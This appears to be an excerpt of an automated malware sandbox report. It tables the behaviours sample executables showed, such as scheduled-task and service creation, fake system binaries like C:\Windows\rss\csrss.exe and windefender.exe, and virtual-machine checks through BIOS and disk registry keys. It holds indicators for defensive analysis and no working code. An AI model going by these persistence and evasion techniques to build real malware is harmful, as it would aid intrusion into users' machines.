| File opened for modification | C:\Windows\Prefetch\MICROSOFTEDGEUPDATE.EXE-C4317749.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNTIMEBROKER.EXE-3ED30A86.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\DLLHOST.EXE-D8E67ED6.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\ReadyBoot\ReadyBoot.etl | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNTIMEBROKER.EXE-9B2E43E1.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SVCHOST.EXE-C49E779A.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\DLLHOST.EXE-504C779A.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\LINQWEBCONFIG.EXE-0FDCD1CB.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\MOBSYNC.EXE-C5E2284F.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\ONEDRIVE.EXE-96969DDA.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\POWERSHELL.EXE-920BBA2A.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-D2B15AE2.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-4EFE6110.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNTIMEBROKER.EXE-06226CEB.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SHELLEXPERIENCEHOST.EXE-A3608B1E.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SVCHOST.EXE-25616620.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SVCHOST.EXE-DF3D779F.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\TASKKILL.EXE-8F5B2253.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\FILESYNCCONFIG.EXE-CB60E6FA.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-99F89D15.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SHUTDOWN.EXE-E7D5C9CC.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_MSFT&PROD_VIRTUAL_DISK\2&1F4ADFFE&0&000003 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000004\Service | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000005\HardwareID | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000005\Service | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_MSFT&PROD_VIRTUAL_DISK\2&1F4ADFFE&0&000004 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_MSFT&PROD_VIRTUAL_DISK\2&1F4ADFFE&0&000005 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000003\HardwareID | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000003\Service | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000004\HardwareID | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key created | \Registry\User\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\help.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%SystemRoot%\System32\ndfapi.dll,-40001 = "Windows Network Diagnostics" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\MUID\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1F927ADE-D054-3EEC-3838-31EC2C3651EB} {0C6C4200-C589-11D0-999A-00C04FD655E1} 0xFFFF = 0100000000000000166fca581f1eda01 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\DualEngineCacheContainerTracker | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids\mhtmlfile = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000e729863a1f1eda01 | C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice\ProgId = "MSEdgeHTM" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
